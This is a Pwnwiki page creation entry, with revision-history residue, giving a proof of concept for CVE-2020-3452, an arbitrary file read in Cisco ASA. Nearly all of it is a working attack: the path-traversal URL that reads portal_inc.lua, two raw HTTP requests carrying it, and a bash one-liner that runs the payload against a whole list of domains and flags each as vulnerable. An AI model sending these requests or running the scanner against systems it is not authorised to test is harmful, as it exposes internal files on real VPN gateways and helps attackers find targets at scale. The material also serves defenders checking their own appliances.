Pwnwiki: Created page with "==POC==

 /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

 GET /+CSCOT+/translation-table?type=mst&textdo..."

2021-04-16T11:46:43Z

Created page with "==POC== <pre> /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ </pre> <pre> GET /+CSCOT+/translation-table?type=mst&textdo..."

New page

==POC==
<pre>
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
</pre>

<pre>
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en
</pre>

<pre>
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Content-Length: 2
</pre>

從列表中單行檢查CVE-2020-3452

<pre>
while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo [VULNERABLE] $DOM || echo [NOT VULNERABLE] $DOM; done < $1
</pre>

CVE-2020-3452 CISCO ASA任意文件讀取漏洞 - Revision history

Pwnwiki: Created page with "==POC==
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

GET /+CSCOT+/translation-table?type=mst&textdo..."